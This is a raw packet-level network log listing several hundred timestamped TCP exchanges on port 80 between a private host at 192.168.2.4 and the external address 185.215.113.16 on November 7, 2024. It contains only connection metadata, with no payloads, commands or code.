Nov 7, 2024 04:12:27.863248110 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863260984 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863286018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863298893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863310099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863322020 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863336086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863344908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863356113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863357067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863368988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863377094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863393068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863399982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863411903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863413095 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863421917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863434076 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863446951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863470078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863600969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863610983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863647938 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.934889078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.934962034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.934973955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.934998989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935010910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935031891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935043097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935055971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935069084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935075045 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935115099 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935142994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935153008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935163975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935177088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935189009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935197115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935200930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935208082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935219049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935229063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935242891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935254097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935261011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935266972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935287952 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935288906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935301065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935305119 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935317993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935336113 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935338974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935353994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935359001 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935364962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935378075 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935385942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935396910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935398102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935409069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935420990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935422897 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935432911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935442924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935453892 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935466051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935477972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935484886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935488939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935503960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935523987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935528040 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935535908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935549021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935563087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935589075 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935591936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935605049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935616016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935626984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935630083 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935647011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935679913 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.935857058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935964108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935975075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935987949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.935998917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936005116 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936012030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936026096 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936048985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936049938 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936062098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936074018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936079979 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936085939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936105967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936110020 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936117887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936131954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936135054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936155081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936156988 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936175108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936178923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936186075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936197042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936207056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936211109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936230898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936235905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936248064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936255932 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936264038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936275005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936284065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936285973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936300039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936302900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936311960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936327934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936332941 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936341047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936352015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936366081 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936371088 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936398029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936408043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936419010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936429977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936453104 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936474085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936480999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936485052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936499119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936518908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936520100 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936542988 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936567068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936598063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936611891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936633110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936634064 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936644077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936647892 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936655998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936667919 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936682940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936685085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936696053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936707020 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936707973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936716080 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936734915 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936745882 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936763048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936774015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936803102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936808109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936836958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936872959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936892986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936904907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936913967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936923981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936933994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936945915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936949015 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936958075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936969042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.936975002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.936990976 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937004089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937006950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.937026978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.937037945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937050104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937055111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.937061071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937071085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.937089920 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.937129021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937146902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937167883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937177896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937186003 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.937190056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937199116 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.937201977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937222004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937231064 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.937233925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937249899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937253952 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.937261105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.937283993 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.937309027 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.970446110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970493078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.970494986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970504999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970515013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970531940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970536947 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.970541000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970576048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.970714092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970772982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970782995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970815897 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.970833063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970844030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970854998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970865011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970894098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970902920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970910072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970912933 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.970916986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.970925093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971020937 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971035004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971046925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971071005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971081018 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971115112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971115112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971127987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971141100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971147060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971169949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971178055 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971196890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971209049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971220016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971240044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971261024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971266031 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971276999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971287966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971297979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971302032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971322060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971359015 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971462011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971471071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971482038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971494913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971506119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971506119 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971518040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971528053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971534967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971538067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971548080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971560001 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971565962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971577883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971587896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971590996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971596003 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971607924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971618891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971623898 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971628904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971648932 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971653938 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971662998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971673012 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971673012 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971683025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971693993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971704006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971707106 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971723080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971729994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971735001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971745014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971745968 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971757889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971769094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971769094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971780062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971785069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971788883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971801996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971812010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971817970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971822023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971831083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971837044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971839905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971858025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971860886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971868038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971880913 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971887112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971890926 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971898079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971906900 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971915960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971920013 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971926928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971935987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971945047 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971946001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971956968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971967936 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.971976042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971986055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.971992970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972002983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972019911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972022057 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972029924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972048044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972050905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972059011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972069025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972073078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972079039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972084045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972100973 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972110033 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972126961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972160101 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972234964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972279072 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972286940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972311020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972321987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972326994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972345114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972359896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.972367048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.972378016 CET	80	49762	185.215.113.16	192.168.2.4
